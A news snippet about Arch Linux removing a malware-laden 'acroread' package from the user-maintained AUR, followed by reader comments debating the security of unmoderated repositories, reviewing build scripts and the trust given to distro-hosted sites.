If you leave stuff by the side of the information superhighway someone will pick it up.
Who knew?
Arch Linux has pulled a user-provided AUR (Arch User Repository) package, because it contained malware. If you're an Arch Linux user who downloaded a PDF viewer named "acroread" in the short time it was compromised, you'll need to delete it. While the breach isn't regarded as serious, it sparked a debate about the security of …
As an Arch user I am well aware of the potential dangers in installing software from the user maintained repo (AUR), and I would hope that this is the case for other users too. It's pretty simple to check the installation script before running it. The advantages of having access to this repo, outweigh the dangers; it just needs using with respect.
In general, any non-moderated repos offer this risk, it certainly is not limited to Arch.
And reading every pkgbuild file? Sure, it will be more fun than reading every EULA for non-free software.
But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.
But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.
Just like what he did here. He put the malicious code in a script retrieved from the Internet.
What if you have a package that retrieves "additional data" from the Internet, not only a script?
Like a game retrieving its assets for example.
Should every single byte it downloads be checked?
I have seen multiple Windows users looking for software by going to google and typing "$product free download" into it...
Yes, that's apparently still the norm for large numbers of people. BTW if you come across one of those, tell them to go to the Wikipedia page for that product (yes there are still people not knowing Wikipedia) and tell them to follow the link to the website of the manufacturer. That's much better security wise. (though not perfect)
This wasn't a main repository. It's an external repository for user-submitted software. Users have to either:
A) Download the build file for manually and follow some steps to build the software
or
B) Install an extra package manager to automate performing A.
I still think there are some interesting lessons to be learned here, though. It might be useful for AUR pages and AUR helpers to highlight when there's been a maintainer change, or allow you to easily view the diff for the build file. I know that that information is currently available on the AUR pages themselves, but making it super obvious when changes like that have occurred would be helpful.
Much as I love the AUR (and have successfully made use of lots of packages from it), I've always been a little concerned about it's 'ports' like nature: it's all well and good it being more convenient than downloading a src tarball but I have no idea what it's pulling from those links (knowing that it's getting file abc from site xyz.somewhere doesn't give me any insight into the code itself and for all I know the src files it dumps on my system have nothing in common with what actually gets compiled - how may bits of linked-out code get added without downloading a corresponding patch file?).
Despite my sense of Gentoo being all hype and no trousers (it's not (B)LFS and setting and forgetting a few compile time switches is not 'compiling your own linux'), I may have to switch to it for peace of mind (just as soon as I can afford a second, identical, system on which to spend all day compiling that is *sigh*).
Don't blame the Arch team for any of this, in fact I give them credit - but inevitably there is a halo around the core distro (any core distro) that extends to anything that is considered "close" to it. So the very fact that AURs start at aur.archlinux.org and not aur.example.com gives AUR an (undeserved) halo of respectability. Yes I know it doesnt deserve it and the page says you try at your own risk. but the halo effect is incredibly strong. Its why people still click on phishing emails from Microsoft Support.